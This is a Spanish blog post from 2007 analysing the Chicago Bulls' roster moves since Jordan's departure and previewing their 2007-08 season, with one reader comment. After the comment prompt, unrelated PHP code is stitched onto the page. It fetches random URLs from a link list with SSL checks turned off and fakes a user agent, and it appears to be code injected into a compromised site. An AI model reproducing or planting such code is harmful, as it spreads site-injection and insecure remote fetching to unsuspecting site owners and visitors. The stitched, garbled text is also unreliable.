Chicago Bulls: paso a paso

25 de September de 2007 por Viva_Dirk

Desde que en el verano de 1998 Michael Jordan dejara para siempre la franquicia de Illinois hasta abril de 2005, cuando volvieron a los Playoffs, pasaron por Chicago 6 temporadas de 30 victorias o menos, elecciones buenas y malvendidas como Elton Brand y Ron Artest, la desgracia de Jay Williams o la eterna espera a la eclosión de Eddy Curry. Fue en el verano de 2004 cuando John Paxson consiguió dar a la plantilla el salto de calidad necesario vía draft, con las elecciones de Ben Gordon en el número 3, Luol Deng en el número 7 (desde Phoenix a cambio de Jackson Vroman, una futura 1ª ronda y cash) y con la contratación como agente libre de Andrés Nocioni, continuando la buena labor del verano anterior donde Kirk Hinrich fue elegido con el número 7.

El primer paso estaba dado y la temporada fue todo un éxito: un balance de 47-35 les colocaba como el tercer mejor equipo del Este, Ben Gordon era el primer rookie en ser elegido 6º hombre del año y, desde luego, volvían a los Playoffs. Pero el paso de la post-temporada se quedaba grande: llegaron, lucharon y perdieron, viendo como finalizaba su sueño con una jugada llena de inexperiencia, donde el fallo no se sabe si de Hinrich o Duhon regaló el último balón para que Washington rematara la faena.

El siguiente verano fue el de la despedida de Eddy Curry, que fue traspasado a New York via sign & trade, lo que supuso la pérdida del máximo anotador y referencia interior del equipo, y que tuvo como consecuencia una liga regular más floja y, de nuevo, la eliminación en la primera ronda de Playoffs, esta vez a manos de Miami Heat.

El siguiente paso se dio en el verano de 2006, donde Ben Wallace se convirtió en un ‘toro’ a cambio de un contrato de 60 millones de dolares y 4 años de duración. Este tremendo desembolso en un jugador netamente defensivo (elegido 4 veces como mejor defensor de la liga) exigía resultados, empezaban a pensar en grande. También llegaron al equipo Tyrus Thomas y Thabo Sefolosha a cambio de LaMarcus Aldridge. Todos estos movimientos iban encaminados a un estilo: defender y correr; ser un equipo duro y a la vez letal. Esa consigna fue cumplida con solvencia durante la regular season (donde un balance de 49-33 era el mejor desde la ‘era Jordan’) y por primera vez en 8 años ganaron una eliminatoria de Playoffs, dejando en la estacada a los que eran vigentes campeones, los Miami Heat. Presentaron batalla ante Detroit, el equipo más hecho del Este, capaz de cambiar el patrón de juego según la necesidad del partido, cualidad que no tenían los Bulls.

Llegamos al verano en cuyo ocaso nos encontramos, y la sensación es que el paso ha sido demasiado corto. Y queda esa sensación porque las opciones han sido variadas y de mucha categoría; la rumorología ha situado junto al lago Michigan a jugadores como Kevin Garnett, Pau Gasol o Zach Randolph, opciones que les permitían mantener la estelar linea exterior, exceptuando el caso del ex de los Wolves. Dichos jugadores habrían dotado al juego de los chicos de Skiles de la capacidad anotadora dentro de la pintura, que fue sin duda el mayor déficit durante la campaña pasada. Una vez descartados estos movimientos, llegó el momento del draft que tantas alegrías ha dado en los últimos años, y la elección de Joakim Noah ha dejado dudas en parte de los aficionados, ya que sus 12 puntos en la última campaña de la NCAA dejan entrever un jugador límitado en ataque, más preparado para la defensa y las labores de intendencia que para la anotación que tanto necesita a su lado Ben Wallace.

De este modo las características de los Bulls para la campaña son muy similares a las que fueron la anterior temporada. Desde el puesto de base Kirk Hinrich dirige las operaciones tanto en defensa como en ataque, su espíritu de lucha es capaz de contagiar a sus compañeros y sus prestaciones han subido cada año, dejando un punto negro en los últimos Playoffs. Ben Gordon es el gran anotador; el jugador capaz de anotar en cualquier situación y en quien todos confían cuando llegan los momentos calientes es también el flanco mas débil de la defensa. Luol Deng deslumbró en las pasadas eliminatorias por el título (22.2 puntos y 8.7 rebotes con un acierto superior al 50% en tiros) y en él están puestas muchas miradas para convertirse en el líder definitivo de este equipo. Su debilidad está sin duda en el tiro de larga distancia, que es la cualidad que le hace falta para convertirse en un jugador total. En el puesto de ala-pívot están las dos jovenes promesas: Tyrus Thomas cuenta con un año de experiencia en la liga, ha demostrado que el juego de defender a tope y correr al máximo le viene como anillo al dedo, dejó muestras de su capacidad atlética y protagonizó alguna de las jugadas más espectaculares del pasado curso; disputándole el puesto estará el rookie Noah, al que se le supone mayor personalidad en su juego y una rápida adaptación a la liga tras sus 3 años en Florida disputando varias finales. De Ben Wallace se espera sin duda una subida en sus prestaciones, pero con 33 años y habiendo disminuido sus números en todas las facetas (salvo en asistencias), un mayor rendimiento del ofrecido la pasada campaña sería una sorpresa y una alegría para sus seguidores.

Desde el banco el jugador con mayor peso es el argentino Andrés Nocioni, con un carácter fundamental en un equipo tan joven y uno de los mejores sextos hombres de la liga. Chris Duhon es la alternativa tanto a Gordon como a Hinrich; ocupa la posición de base con seriedad y oficio, difícilmente le veremos perder un balón y aun así consigue canastas fáciles para los que le rodean, es el jugador de intendencia por excelencia. Joe Smith y Griffin deberían tener un papel de noveno y décimo hombre por las cualidades baloncestísticas que poseen, pero viendo la trayectoria de Scott Skiles no sería de extrañar verlos ocupando un lugar en el quinteto inicial durante algunos momentos de la temporada. La veteranía es su mejor baza. Thabo Sefolosha dejó su tarjeta de visita con sus capacidades para la defensa y el tiro. Sus minutos dependerán del papel que Skiles otorgue a Griffin y de las lesiones de Nocioni. Khryapa ha cuajado un gran Europeo pero en teoría su papel será marginal.

BullsNos encontramos ante un equipo aspirante a todo pero favorito a nada por su falta de talento anotador en posiciones interiores. Tanto Deng como Gordon pueden seguir creciendo, si Noah o Tyrus (o ambos) dan buenas señales serán peligrosos, sin embargo lo normal es que no lleguen a donde quieren. Afortunadamente normalidad y deporte suelen ir en diferentes direcciones.

Quinteto: Hinrich, Gordon, Deng, Tyrus/Noah y Wallace

Sexto hombre: Nocioni

Pronóstico: Final de Conferencia

Comenta

Un comentario a esta entrada

  1. RusticoColorao dice:
    #1

    Gran análisis Álvaro…aunque creo que nos falta algo para llegar a final de conferencia…¿un líder quizás?

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>